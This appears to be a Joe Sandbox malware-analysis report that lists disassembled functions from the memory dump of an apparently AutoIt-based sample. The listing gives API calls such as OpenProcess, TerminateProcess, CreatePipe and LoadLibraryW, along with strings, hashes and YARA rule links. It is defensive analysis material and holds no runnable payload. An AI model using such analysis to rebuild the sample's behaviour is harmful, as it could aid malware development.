MapVirtualKeyW.USER32(0000005B,00000000), ref: 001103D3
MapVirtualKeyW.USER32(00000010,00000000), ref: 001103DB
MapVirtualKeyW.USER32(000000A0,00000000), ref: 001103E6
MapVirtualKeyW.USER32(000000A1,00000000), ref: 001103F1
MapVirtualKeyW.USER32(00000011,00000000), ref: 001103F9
MapVirtualKeyW.USER32(00000012,00000000), ref: 00110401

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Virtual
String ID:
API String ID: 4278518827-0
Opcode ID: 786cd93203e52df3efa184f39ec07bca5dec3e814a1a54ccb91d6c42e32e35e8
Instruction ID: 18dcc5a2073779331193044123c368d8b33cca5038426ad3746165417a6080e0
Opcode Fuzzy Hash: 786cd93203e52df3efa184f39ec07bca5dec3e814a1a54ccb91d6c42e32e35e8
Instruction Fuzzy Hash: 3A0148B09417597DE3008F5A8C85A52FEA8FF19354F00411BA15C47941C7B5A864CBE5

Function 0015568B Relevance: 9.0, APIs: 6, Instructions: 43windowtimethreadCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0015569B
SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 001556B1
GetWindowThreadProcessId.USER32(?,?), ref: 001556C0
OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001556CF
TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001556D9
CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 001556E0

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
String ID:
API String ID: 839392675-0
Opcode ID: 23a372bcaadde392dc618c825532aed3492a4372416e55a551cf3ec2f45c3bf6
Instruction ID: 2006fe90efe804efdbef060c950003ccd4bfa09bb3da1f091c4807d0195f88e3
Opcode Fuzzy Hash: 23a372bcaadde392dc618c825532aed3492a4372416e55a551cf3ec2f45c3bf6
Instruction Fuzzy Hash: 32F03032245158BBE7215BA2DC0DEEF7B7CEFCAB11F00016DFA08D1450D7A11A82C6B5

Function 001574D2 Relevance: 9.0, APIs: 6, Instructions: 33synchronizationthreadCOMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(?,?), ref: 001574E5
EnterCriticalSection.KERNEL32(?,?,00101044,?,?), ref: 001574F6
TerminateThread.KERNEL32(00000000,000001F6,?,00101044,?,?), ref: 00157503
WaitForSingleObject.KERNEL32(00000000,000003E8,?,00101044,?,?), ref: 00157510

Part of subcall function 00156ED7: CloseHandle.KERNEL32(00000000,?,0015751D,?,00101044,?,?), ref: 00156EE1

InterlockedExchange.KERNEL32(?,000001F6), ref: 00157523
LeaveCriticalSection.KERNEL32(?,?,00101044,?,?), ref: 0015752A

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CriticalExchangeInterlockedSection$CloseEnterHandleLeaveObjectSingleTerminateThreadWait
String ID:
API String ID: 3495660284-0
Opcode ID: ec68049093593762761de8969e8f98ad7e6e33865add2c0d65efd2ecbbf62a3c
Instruction ID: ed8fbc2dbc1258a60fe4fa77540082000a13eb6a45c22eb36a5c6e775c909e4b
Opcode Fuzzy Hash: ec68049093593762761de8969e8f98ad7e6e33865add2c0d65efd2ecbbf62a3c
Instruction Fuzzy Hash: FDF03A3A144612EBDB111B64FC899EB773AFF45302F400539F606958A2DB7598C6CAA0

Function 00148E74 Relevance: 9.0, APIs: 6, Instructions: 23memorysynchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.KERNEL32(?,000000FF), ref: 00148E7F
UnloadUserProfile.USERENV(?,?), ref: 00148E8B
CloseHandle.KERNEL32(?), ref: 00148E94
CloseHandle.KERNEL32(?), ref: 00148E9C
GetProcessHeap.KERNEL32(00000000,?), ref: 00148EA5
HeapFree.KERNEL32(00000000), ref: 00148EAC

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CloseHandleHeap$FreeObjectProcessProfileSingleUnloadUserWait
String ID:
API String ID: 146765662-0
Opcode ID: cd2b7a043599d21f1ac3e1d8d45a2d432b973a59ebefc9e308c2a7e1b09523f2
Instruction ID: 16c0ed66f6ba8d8803f836147f8af08fd186783598efc1ac37909c48db2474e9
Opcode Fuzzy Hash: cd2b7a043599d21f1ac3e1d8d45a2d432b973a59ebefc9e308c2a7e1b09523f2
Instruction Fuzzy Hash: 4EE05276104505FBDA011FF5EC0C95ABB79FB89762B608639F21D82870CB3294E2DB60

Function 00168902 Relevance: 9.0, APIs: 3, Strings: 2, Instructions: 225COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00168928
CharUpperBuffW.USER32(?,?), ref: 00168A37
VariantClear.OLEAUT32(?), ref: 00168BAF

Part of subcall function 00157804: VariantInit.OLEAUT32(00000000), ref: 00157844
Part of subcall function 00157804: VariantCopy.OLEAUT32(00000000,?), ref: 0015784D
Part of subcall function 00157804: VariantClear.OLEAUT32(00000000), ref: 00157859

Strings

AUTOIT.ERROR, xrefs: 00168A3D
Incorrect Parameter format, xrefs: 00168960, 00168B22

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4237274167-1221869570
Opcode ID: 612010315dcad177e6617296e2d5f04a14a96b7219013152a5ffbbecb35df133
Instruction ID: baf24daa73a9e35ae76d2fc9ee20ea0d742674eaf4fb3f566fcb829ef8b5683e
Opcode Fuzzy Hash: 612010315dcad177e6617296e2d5f04a14a96b7219013152a5ffbbecb35df133
Instruction Fuzzy Hash: 319190716083059FC714DF28C88596BBBF4EF89314F044A6EF99A8B362DB31E945CB52

Function 00152F86 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 195windowCOMMON

Download Yara Rule

APIs

Part of subcall function 0010FEC6: _wcscpy.LIBCMT ref: 0010FEE9

_memset.LIBCMT ref: 00153077
GetMenuItemInfoW.USER32(?,?,00000000,?), ref: 001530A6
SetMenuItemInfoW.USER32(?,?,00000000,?), ref: 00153159
SetMenuDefaultItem.USER32(?,000000FF,00000000), ref: 00153187

Strings

0, xrefs: 00153063

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ItemMenu$Info$Default_memset_wcscpy
String ID: 0
API String ID: 4152858687-4108050209
Opcode ID: 9ea598d2d95a59e09b291cbe3c1fa07da13f4c4fc30842459812b847c0c2b90d
Instruction ID: 480a9b8af946de780c10ec42718d1e02c04f76a74166e60058329a5b3708f068
Opcode Fuzzy Hash: 9ea598d2d95a59e09b291cbe3c1fa07da13f4c4fc30842459812b847c0c2b90d
Instruction Fuzzy Hash: 2F51A232608700DAD7199F38D8856ABB7E4EF55391F04092DFDB5DB1D1DB70CA888792

Function 00179A63 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(00A6E550,?), ref: 00179AD2
ScreenToClient.USER32(00000002,00000002), ref: 00179B05
MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,00000002,?,?), ref: 00179B72

Strings

@U=u, xrefs: 00179BCD

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Window$ClientMoveRectScreen
String ID: @U=u
API String ID: 3880355969-2594219639
Opcode ID: 32f6a98f4b9cd4ac0187980f260f57f6d332628cfd56d15e83a39cc9e2684b46
Instruction ID: dcddd0c0a1cf7cb22e36bced4fefa85fe24f7befe1afaf6ac0501f68be55a994
Opcode Fuzzy Hash: 32f6a98f4b9cd4ac0187980f260f57f6d332628cfd56d15e83a39cc9e2684b46
Instruction Fuzzy Hash: A6512D35A00209EFCF14DF68D881DAE7BB6FF55320F148269F9199B2A0D730AD85CB90

Function 0014DA5D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 121comlibraryloaderCOMMON

Download Yara Rule

APIs

CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0014DAC5
SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0014DAFB
GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0014DB0C
SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0014DB8E

Strings

DllGetClassObject, xrefs: 0014DB01

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorMode$AddressCreateInstanceProc
String ID: DllGetClassObject
API String ID: 753597075-1075368562
Opcode ID: bbf8df6739e77d1276af9c2d25143e5a96d062127900a29a58ae6e59edce31fe
Instruction ID: 0228e25f0cdfef452f3f67be395478258aa0269223b24739523272a3583f3cb5
Opcode Fuzzy Hash: bbf8df6739e77d1276af9c2d25143e5a96d062127900a29a58ae6e59edce31fe
Instruction Fuzzy Hash: 12416FB1600208EFDF15CF54D885A9A7BB9EF45350F1680AEED099F225D7B1DE44CBA0

Function 00152C42 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00152CAF
GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00152CCB
DeleteMenu.USER32(?,00000007,00000000), ref: 00152D11
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,001B6890,00000000), ref: 00152D5A

Strings

0, xrefs: 00152CA4

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: Menu$Delete$InfoItem_memset
String ID: 0
API String ID: 1173514356-4108050209
Opcode ID: 44b9bf03da39bae3631e760459ed23b99526db2cfbfaa9bf04db14dbcaf729cf
Instruction ID: a5fe49b4d6fd05bd631f83c1f2b1996eb29fe919e7118b810e7bef04ac32c036
Opcode Fuzzy Hash: 44b9bf03da39bae3631e760459ed23b99526db2cfbfaa9bf04db14dbcaf729cf
Instruction Fuzzy Hash: 84417E32204302DFD724DF64C845B5ABBE8AF86321F14466EF9759B291D770E909CB92

Function 00178AC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 109COMMON

Download Yara Rule

APIs

InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00178B4D

Strings

@U=u, xrefs: 00178B9C

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: InvalidateRect
String ID: @U=u
API String ID: 634782764-2594219639
Opcode ID: 99e20eca8132f5c8765def2b249cf302c7c1cb5c75a48d6e1b7dd2b612aa9eb2
Instruction ID: 89ae46da0f33c162953ff614082724d2493a78c51640f7583fc255f360e401e4
Opcode Fuzzy Hash: 99e20eca8132f5c8765def2b249cf302c7c1cb5c75a48d6e1b7dd2b612aa9eb2
Instruction Fuzzy Hash: 353194B4680204BEEB249E28CC9DFA93775EB09310F64C616FA59D76E1CF31A9809751

Function 0016DAB9 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 101COMMON

Download Yara Rule

APIs

CharLowerBuffW.USER32(?,?,?,?,00000000,?,?), ref: 0016DAD9

Part of subcall function 000F79AB: _memmove.LIBCMT ref: 000F79F9

Strings

winapi, xrefs: 0016DB4A
stdcall, xrefs: 0016DB5B
none, xrefs: 0016DBB4
cdecl, xrefs: 0016DB30

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: BuffCharLower_memmove
String ID: cdecl$none$stdcall$winapi
API String ID: 3425801089-567219261
Opcode ID: 95dadf611b42b588ecbbb2535a476ec510755447eb1a006ff01cd485bbbb51ba
Instruction ID: 054d3975eb39d84c2c84fc858a1c56a6b4a5f450f4ade11941d19fd18d8a675b
Opcode Fuzzy Hash: 95dadf611b42b588ecbbb2535a476ec510755447eb1a006ff01cd485bbbb51ba
Instruction Fuzzy Hash: 9A31E670A046199FCF00EF94DC818FEB3B4FF16320B018A29E925A76D6CB71A955CB80

Function 000F410D Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON

Download Yara Rule

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 0012D5EC

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

_memset.LIBCMT ref: 000F418D
_wcscpy.LIBCMT ref: 000F41E1
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000F41F1

Strings

Line: , xrefs: 0012D615

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
String ID: Line:
API String ID: 3942752672-1585850449
Opcode ID: 1a0a55ec880e178ef216c436ddeb60d8b993b0fe5ff43d329702b29e8a6a0c4a
Instruction ID: d04307e36d2f6803022fff2cff226183497b9b64239d96cce22b49bef497af27
Opcode Fuzzy Hash: 1a0a55ec880e178ef216c436ddeb60d8b993b0fe5ff43d329702b29e8a6a0c4a
Instruction Fuzzy Hash: A331E4710083085AE735EB60DC45FFB77E8AF55300F10461EF689928A2EB789689D793

Function 00176656 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 80windowlibraryCOMMON

Download Yara Rule

APIs

Part of subcall function 000F1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 000F1D73
Part of subcall function 000F1D35: GetStockObject.GDI32(00000011), ref: 000F1D87
Part of subcall function 000F1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 000F1D91

SendMessageW.USER32(00000000,00000467,00000000,?), ref: 001766D0
LoadLibraryW.KERNEL32(?), ref: 001766D7
SendMessageW.USER32(?,00000467,00000000,00000000), ref: 001766EC
DestroyWindow.USER32(?), ref: 001766F4

Strings

SysAnimate32, xrefs: 001766AB

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: MessageSend$Window$CreateDestroyLibraryLoadObjectStock
String ID: SysAnimate32
API String ID: 4146253029-1011021900
Opcode ID: 9668d4a4e8cc18aa2a372279c3c1af92f2570250b140c11403f8b15fedf2c9d7
Instruction ID: ce06d0fb3a67dde6dc99e1d31cbc433cc4014c99a5dc84d109f5e11702fd1d99
Opcode Fuzzy Hash: 9668d4a4e8cc18aa2a372279c3c1af92f2570250b140c11403f8b15fedf2c9d7
Instruction Fuzzy Hash: 7F219D75200A06ABEF104F64EC80EBB37BDFF59368F908629FA1892190D771CC919B60

Function 0015703E Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(0000000C), ref: 0015705E
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00157091
GetStdHandle.KERNEL32(0000000C), ref: 001570A3
CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 001570DD

Strings

nul, xrefs: 001570D8

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 24cb9c1784bebd35f3afd59052bf3f00feb6f624ebd538c57953f92c3c162882
Instruction ID: f44b62b7a41d4dc24690d901f6a5ab7614d913aa050060a5bc304e845a0cb664
Opcode Fuzzy Hash: 24cb9c1784bebd35f3afd59052bf3f00feb6f624ebd538c57953f92c3c162882
Instruction Fuzzy Hash: 7B218174504309EBDB209F29EC06A9AB7F8AF56721F204A19FCB1DB2D0D7709884CB50

Function 0015710C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79filepipeCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 0015712B
CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 0015715D
GetStdHandle.KERNEL32(000000F6), ref: 0015716E
CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 001571A8

Strings

nul, xrefs: 001571A3

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: CreateHandle$FilePipe
String ID: nul
API String ID: 4209266947-2873401336
Opcode ID: 28aae69b89aaaaf2426f0c5e4f902a33655709dca3504f5aa269e950807f3116
Instruction ID: 47d73be0ffebc424de96e3bc42c35de36e5c578f8e6436c884e4c698b169deb3
Opcode Fuzzy Hash: 28aae69b89aaaaf2426f0c5e4f902a33655709dca3504f5aa269e950807f3116
Instruction Fuzzy Hash: E521F575504705DBDB209F28AC86AAAB7F8AF55331F20061DFCB1DB2D0D7709889CBA0

Function 0015AEAB Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 73COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 0015AEBF
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0015AF13
__swprintf.LIBCMT ref: 0015AF2C
SetErrorMode.KERNEL32(00000000,00000001,00000000,0017F910), ref: 0015AF6A

Strings

%lu, xrefs: 0015AF26

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.000000000017F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318799341.00000000001A5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318850138.00000000001AF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1318867846.00000000001B8000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f0000_rcrypt.jbxd

Similarity

API ID: ErrorMode$InformationVolume__swprintf
String ID: %lu
API String ID: 3164766367-685833217
Opcode ID: 72c9043b7797120ae0e2fcdb05727e1d607cba73d44926c63ec284c1e7f1f996
Instruction ID: 9cca4d87e743492eef4607af6524e8f7ae9155ca4059d453fd3a40c61fcb41a4
Opcode Fuzzy Hash: 72c9043b7797120ae0e2fcdb05727e1d607cba73d44926c63ec284c1e7f1f996
Instruction Fuzzy Hash: 88214134A00109AFCB10DF64CD85EEE7BB8EF49705B104069F909EB252DB71EA45DB61

Function 0014A52F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 68windowCOMMON

Download Yara Rule

APIs

Part of subcall function 000F7D2C: _memmove.LIBCMT ref: 000F7D66

Part of subcall function 0014A37C: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 0014A399
Part of subcall function 0014A37C: GetWindowThreadProcessId.USER32(?,00000000), ref: 0014A3AC
Part of subcall function 0014A37C: GetCurrentThreadId.KERNEL32 ref: 0014A3B3
Part of subcall function 0014A37C: AttachThreadInput.USER32(00000000), ref: 0014A3BA

GetFocus.USER32 ref: 0014A554

Part of subcall function 0014A3C5: GetParent.USER32(?), ref: 0014A3D3

GetClassNameW.USER32(?,?,00000100), ref: 0014A59D
EnumChildWindows.USER32(?,0014A615), ref: 0014A5C5
__swprintf.LIBCMT ref: 0014A5DF

Strings

%s%d, xrefs: 0014A5D9

Memory Dump Source

Source File: 00000000.00000002.1318694486.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true

Associated: 00000000.00000002.1318642599.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
